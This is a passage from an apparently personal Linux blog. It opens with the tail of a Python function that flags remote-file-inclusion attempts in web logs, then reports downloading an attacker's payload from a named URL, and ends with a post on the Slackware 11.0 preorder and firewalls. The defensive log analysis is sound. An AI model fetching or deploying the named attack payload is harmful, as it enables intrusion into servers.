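        outcome = "not successful: requested script does not exist (404)"
    elif 200 <= rec["status"] < 300:
        outcome = "possible: script answered, check the server for signs of execution"
    else:
        outcome = "unclear: status %d, review" % rec["status"]
    return {"ip": rec["ip"], "rfi": True, "script": path, "status": rec["status"],
            "outcome": outcome, **hits[0]}
```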

I wget'd the below from http://www.linuxsystems.go.ro/cmd.txt, which is what the attacker apparently tried to upload to my machine:

[I'll add the content when I can figure out how to add the code without blogger.com attempting to process it...and besides, I'm at work now.]

This is nasty stuff here, if your machine isn't hardened.

Wednesday, March 29, 2006

Slackware v11.0 Preorder

Slackware is offering Slackware v11.0 for preorder. This probably means that v11.0 will be released to the public soon. I'm still running a version of Slackware-current that is a few months out-of-date, but my goal is to update to the latest soon, so I can be as current as possible for v11.0 (not that it makes a real difference).

Also, for those of you that don't update your Slackware installation much, you need to become familiar with this page: Slackware's Security Advisories.

Lastly, for you guys and gals who want to run firewalls on your machines, I've finally got IPTABLES running on Wigglit.ath.cx, using Arno's Firewall Script. This script is very intuitive and you can customize it to your server's needs. I highly recommend at least giving the script a try.